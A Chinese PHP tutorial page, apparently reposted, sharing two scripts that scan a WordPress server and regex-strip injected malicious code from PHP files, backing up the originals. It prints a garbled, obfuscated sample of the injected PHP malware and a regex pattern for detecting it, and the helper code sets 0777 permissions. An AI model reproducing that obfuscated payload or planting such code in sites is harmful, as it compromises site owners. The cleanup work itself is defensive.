Home >Backend Development >PHP Tutorial >PHP to remove malicious code in wordpress_php tips

PHP to remove malicious code in wordpress_php tips

WBOY
WBOYOriginal
2016-05-16 20:06:201105browse

Some of the company’s wordpress websites had malicious code in the downloaded plug-ins, which resulted in the presence of malicious code in the PHP files of all websites on the entire server, so I wrote a simple script to remove them.

Malicious code example

Copy code The code is as follows:

af07ee708650c948e36a4c84fb7b99d35eda0b0a254ad237e1b5fe2ebedc06cc!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyfx25yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#c38e9dc8e4bec3ebd9c7608a30e75139!#]y81]273]y>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#ee6615214c8060c95420f4af24151e84^#zsfvrx5c%x7827&6fdd62d8b873bdca6f5c8a6c73d644ac5hmg%x5c%x7825!8141c42af04c24b6c356713ee262f06aj%%x5c%x7825:|:**t%x5c%xW~!%x5c%x7825z!>264e61b9099a7d5707c6b4e9e827038c1178b488e1b81cdf4668a4b7c23f957c5c5b:8dae164f209c9cb9fcbb5f443cdc7f8c%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!e24f48cb6718061d3cdd08349909b47d:8:|:7#6ufs!|ftmf!~ab34f049344c021ef90beea0b60bfd1d!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x782535c23e2917023bf9bf1899f711b10299%x5c%x782f7rfs%x5c%x78256d02d700e83586b003fc02455d77f77c0!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^e8b9e16b8fb5a352e5f2de505ea38267n%x5c%x7825639288daa0b26de23847f856a8c83166!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-x25)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfV%x5c%x787f67f87493de7ab04b4717b25d23b39388u%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace("%x2f%ggg)(0)%x5c%x782f *0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%xS["%x616%x756%x61"]=1; function f0aa11bfa42aca2050f12fa62cbf5a756:h%x5c%x7825:89965b833359882ce180efbee398ebfe!2p%x5c2fh%x5c%x7825:a83bd25b9bb729e617ef5ad2df720681%x5c%x7825fdy462d7966084db8ff362718aa0552aeddU495e9e5c03aa377b860e4358047ee77dm%x5c%x5c%x7825!e2fb9bc979a8f8fdabed0b11bf981002qp%x5c%x7825!|Z~!045c5929d9bf6a444c362eb28b478f67!2p%x5c%x7825!|!*!***b%x5#P#-#Q#-#B#-#T#-#E#-#G#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*WCw*[!%x5c%x7825rN}#QwTW%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2eR%x29W%x65","%x656%x614%x281%x6d0%x6c%) opjudovg )!gj {e%x5c%x7825!osvufs!*! A!>!{e%x5cx27pd%x5c%x78256f59a3d882512058d4ca819c417eb6e69b%x5c%x7825!*##>>X)!gjZd38492d58ae0a96852a16f1ae2411772b%x5c%x7825!**X)ufttj%x7825c:>1b4d6bbf2d2894841d61c194a5ae5d39b1fcdb6ec6fee04a10ddcb6b3565feef1b%x5c%x782272qj%x5c%x7825)7gj6e7965afd1b80434accbeea746a2301ca!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!bdcff5b7a339fff473c4394bb828aa91>}R;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~64608a1747093ab5e0c3392ab3c758e29>%x5c%|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x78!}%x5c%x7827;!>>6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}X;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]D6M7]K3#edc7e4f9226196e93c3cdaae40a885e5}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x55c%x787fw6ab05fd2f0707f4782540d98786f8ecd9>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x78259388c921f4710fc5b4bb2bc6d2a229e1q5c%x7825)!gj!231a325d87f44e733e5e69f8d3f229702bd%x5c%x7825!2qj%x5c%x78257-K)udfoopdXA%x54cc66781ffe8a656a710571593c14f324!#]y76]277]y72]265]y39]274]y85]273]y6658f1009b77ad79fd30e5136afe44f98c12b99c5d2e2a684eb3bb95e4d1d5a813c?*2b%x5c%x7825)gpf{jt)!gj!d5c7276a6a7e3967ba43167d211be23f:r7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#d19780f2ba003a7f7631026b92405a66>2*!%x5c%x7825z>3dba58e2dc7a79e95b4b3fe95f86028faj%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]K4]65]D8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!3e841dc1a9c58a6e9e23d25c9b0cfdf4!#]y84]275]y83]248]y83]256c%x7825V%x5c%x7827{ftmfV%x5c%x787fb532f9b30a18de2026a6e89664d44702%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qjA)qj3hopmA%x578Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%87440905638935dd39bef35fbda33bac>!}W;utpi}Y;tuofuopd%x5c%x7tsbqA7>q%x5c%x782567e634c4d59dc8fe6be1b537519c28e37%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!OVMM*33d6d4d94ea62226c2414c0e986258f3#L4]275L3]248L3P6L1M5]D2P4]D6#b185be687de6d6cfce092cd573e02332>1*!%x5c%x7825b:]y4c#512f72a192f06237a2f81e20bfad4f2b!%x5c%x7824Ypp3)%x5c%x7825cB%x5c�6 99386c6f 9f5d816: 946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTbek!~!a7ea52b01b4c6905e4e1d08727d42d90bjepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*4edebf735d5b1f8ea443bc3de03d5196q%x5c%x7825V4f469290f2b9c98d3f3e57c631e6bfca>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!5)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7%x7825c*W%x5c%x7825eN #Qi%x5c%x785c1^W%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~ac4b022934e6bee72dce9fc079d1b56e#]y31]278]y3e]81]K78:569x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWtj%x5c%x7822)gj640dcdb3c9e1c66dadad6339f19dc510d!%x5c%x782400~:65914b6fbb6365c26bd8a5364f6864a5Ew:Qb:Qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#} ;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>1df006becf0a5a454f0d653b44ec011991e9361f154f8e06f882f0793de1ec9586%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?] ^?]_%x5c%x785c}X%x5c%x782{66~6a2bd8cd6030799b6279337d77d1a3cfbj%x5c%x7825!*3!%x5c%x7827c%x78256f6440588fc51d5eb4a33befb4e6faa6b!#]y84]275]y83]273]y76]277#5514d99584ca698418bf04572559c46b2b%x5cx25%x5c%x7827Y%x5c%x782569766b90a2ccb7f0a712080bd3b4ba9f0EzH,2W%x5c%x7825wN;#-Ez-1H94P%x224%x78b%x355%x3a6%x21v%x5fdy)##-!#~9e18981193da100b910588b6a7ce4d832316a5fd86f7a16777cb122a04535e562%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#c8568569393f2a7a522224da3778e87d

恶意代码清理程序

<&#63;php 
/**
 * 文件名:delUnwantedCode.php
 * 功能:删除FTP里恶意代码
 * 使用说明:
 *   请将文件上传到需要清除恶意代码的目录,然后通过CLI或浏览器访问即可,原有被感染的文件会自动备份
 */

$path = dirname(__FILE__); #定义需要处理的目录
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php');  #定义源文件备份目录,程序过滤恶意代码前,先按原有的路径备份文档到此目录
$fileType = array('php');  #定义需要处理的文件类型(后缀名),小写
$search = array('@<\&#63;php\s*if\(\!isset\(\$GLOBALS\["\\\x61\\\156\\\x75\\\156\\\x61"\]\)\).*\$bssaiikhvn=\$jtgibaqypx-1;\s*\&#63;>@si');  #定义需要过滤的恶意代码规则
$search_count = array(
  'all_file'=>array(), #所有文件
  'search_file0'=>array(),   #没有恶意代码文件
  'search_file1'=>array() #含有恶意代码文件
);

$filelist = listDir($path,$fileType,false); #读取目录里符合条件文件列表
if(!empty($filelist)){
  foreach ($filelist as $file){
    $file = (isset($file['name'])&#63;$file['name']:$file);
    $search_count['all_file'][] = $file;
    $fileContent = file_get_contents($file);
    $compile_fileContent = preg_replace($search, '', $fileContent);
    if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
      #过滤后文件长度不一致,则表示含有恶意代码(备份文件所在目录不过滤)
      $search_count['search_file1'][] = $file;
       
      ############备份原有文件 开始###############
      $bakFile = str_replace($path, $bak_path, $file);
      @make_dir(dirname($bakFile));
      @file_put_contents($bakFile, $fileContent);
      ############备份原有文件 结束###############
       
      #重新写入过滤后的内容到原有的PHP文件
      @file_put_contents($file, $compile_fileContent);
    }else{
      $search_count['search_file0'][] = $file;
    }
  }
}
 
#print_r($search_count);die;
echo sprintf('从%s里共搜索到%s个符合条件的文件,其中%s个存在恶意代码,已处理结束',$path,count($search_count['all_file']), count($search_count['search_file1']));die;

########################
## 辅助函数
########################
 
/**
 * 检查目标文件夹是否存在,如果不存在则自动创建该目录
 *
 * @access   public
 * @param    string   folder   目录路径。不能使用相对于网站根目录的URL
 *
 * @return   bool
 */
function make_dir($folder){
  $reval = false;
  if (!file_exists($folder)){
    #如果目录不存在则尝试创建该目录
    @umask(0);
 
    #将目录路径拆分成数组
    preg_match_all('/([^\/]*)\/&#63;/i', $folder, $atmp);
 
    #如果第一个字符为/则当作物理路径处理
    $base = ($atmp[0][0] == '/') &#63; '/' : '';
 
    #遍历包含路径信息的数组
    foreach ($atmp[1] AS $val){
      if ('' != $val){
        $base .= $val;
        if ('..' == $val || '.' == $val){
          #如果目录为.或者..则直接补/继续下一个循环
          $base .= '/';
          continue;
        }
      }else{
        continue;
      }
 
      $base .= '/';
 
      if (!file_exists($base)){
        #尝试创建目录,如果创建失败则继续循环
        if (@mkdir(rtrim($base, '/'), 0777)){
          @chmod($base, 0777);
          $reval = true;
        }
      }
    }
  }else{
    #路径已经存在。返回该路径是不是一个目录
    $reval = is_dir($folder);
  }
 
  clearstatcache();
 
  return $reval;
}

########获取目录下所有文件,包括子目录 开始################
function listDir($path,$fileType=array(),$fileInfo=true){
  $path = str_replace(array('/','\\'), DIRECTORY_SEPARATOR, $path);
  if(!file_exists($path)||!is_dir($path)){
    return '';
  }
  if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
    $path = substr($path, 0,-1);
  }
  $dirList=array();
  $dir=opendir($path);
  while($file=readdir($dir)){
    #若有定义$fileType,并且文件类型不在$fileType范围内或文件是一个目录,则跳过
    if($file!=='.'&&$file!=='..'){
      $file = $path.DIRECTORY_SEPARATOR.$file;
      if(is_dir($file)){
        if(empty($fileType)){
          $dirList[] = ($fileInfo==true&#63;array('name'=>$file,'isDir'=>intval(is_dir($file))):$file);
        }
        $dirList = array_merge($dirList,listDir($file,$fileType));
      }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
        $dirList[] = ($fileInfo==true&#63;array('name'=>$file,'isDir'=>intval(is_dir($file)),'md5_file'=>md5_file($file),'filesize'=>filesize($file),'filemtime'=>filemtime($file)):$file);
      }
    };
  };
  closedir($dir);
  return $dirList;
}
########获取目录下所有文件,包括子目录 结束################

删除FTP里恶意代码(支持任意数量的文件处理)

<&#63;php 
/**
 * 文件名:delAllUnwantedCode.php
 * 功能:删除FTP里恶意代码(支持任意数量的文件处理)
 * 使用说明:
 *   请将文件上传到需要清除恶意代码的目录,然后通过CLI或浏览器访问即可,原有被感染的文件会自动备份
 */
set_time_limit(0);ignore_user_abort(true);

$path = dirname(__FILE__); #定义需要处理的目录
$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php');  #定义源文件备份目录,程序过滤恶意代码前,先按原有的路径备份文档到此目录
$fileType = array('php');  #定义需要处理的文件类型(后缀名),小写
$search = array('@<\&#63;php\s*if\(\!isset\(\$GLOBALS\["\\\x61\\\156\\\x75\\\156\\\x61"\]\)\).*\$bssaiikhvn=\$jtgibaqypx-1;\s*\&#63;>@si');  #定义需要过滤的恶意代码规则
$file_count = array(
  'all_file'=>0,  #所有文件
  'filter_file'=>0   #含有恶意代码文件
);

replaceUnwantedCode($path); #执行过滤

#print_r($search_count);die;
echo sprintf('从%s里共搜索到%s个符合条件的文件,其中%s个存在恶意代码已清理,原始文件保存在%s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);die;

function replaceUnwantedCode($path){
  global $bak_path,$fileType,$search,$file_count;
  $path = str_replace(array('/','\\'), DIRECTORY_SEPARATOR, $path);
  if(!file_exists($path)||!is_dir($path)){
    return '';
  }
  if(substr($path, -1,1)==DIRECTORY_SEPARATOR){
    $path = substr($path, 0,-1);
  }
  $dir=opendir($path);
  while($file=readdir($dir)){
    #若有定义$fileType,并且文件类型不在$fileType范围内或文件是一个目录,则跳过
    if($file!=='.'&&$file!=='..'){
      $file = $path.DIRECTORY_SEPARATOR.$file;
      if(is_dir($file)){
        replaceUnwantedCode($file);
      }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){
        ################################
        @$file_count['all_file']++;
        $fileContent = file_get_contents($file);  #文件原始代码
        $compile_fileContent = preg_replace($search, '', $fileContent); #过滤后的内容
        if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){
          #过滤后文件长度不一致,则表示含有恶意代码(备份文件所在目录不过滤)
          $file_count['filter_file']++;
             
          ############备份原有文件 开始###############
          $bakFile = str_replace($path, $bak_path, $file);
          @make_dir(dirname($bakFile));
          @file_put_contents($bakFile, $fileContent);
          ############备份原有文件 结束###############
             
          #重新写入过滤后的内容到原有的PHP文件
          @file_put_contents($file, $compile_fileContent);
        }
        ################################
        unset($fileContent,$compile_fileContent);
      }
    };
  };
  closedir($dir);
  return true;
}

########################
## 辅助函数
########################
 
/**
 * 检查目标文件夹是否存在,如果不存在则自动创建该目录
 *
 * @access   public
 * @param    string   folder   目录路径。不能使用相对于网站根目录的URL
 *
 * @return   bool
 */
function make_dir($folder){
  $reval = false;
  if (!file_exists($folder)){
    #如果目录不存在则尝试创建该目录
    @umask(0);
 
    #将目录路径拆分成数组
    preg_match_all('/([^\/]*)\/&#63;/i', $folder, $atmp);
 
    #如果第一个字符为/则当作物理路径处理
    $base = ($atmp[0][0] == '/') &#63; '/' : '';
 
    #遍历包含路径信息的数组
    foreach ($atmp[1] AS $val){
      if ('' != $val){
        $base .= $val;
        if ('..' == $val || '.' == $val){
          #如果目录为.或者..则直接补/继续下一个循环
          $base .= '/';
          continue;
        }
      }else{
        continue;
      }
 
      $base .= '/';
 
      if (!file_exists($base)){
        #尝试创建目录,如果创建失败则继续循环
        if (@mkdir(rtrim($base, '/'), 0777)){
          @chmod($base, 0777);
          $reval = true;
        }
      }
    }
  }else{
    #路径已经存在。返回该路径是不是一个目录
    $reval = is_dir($folder);
  }
 
  clearstatcache();
 
  return $reval;
}

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn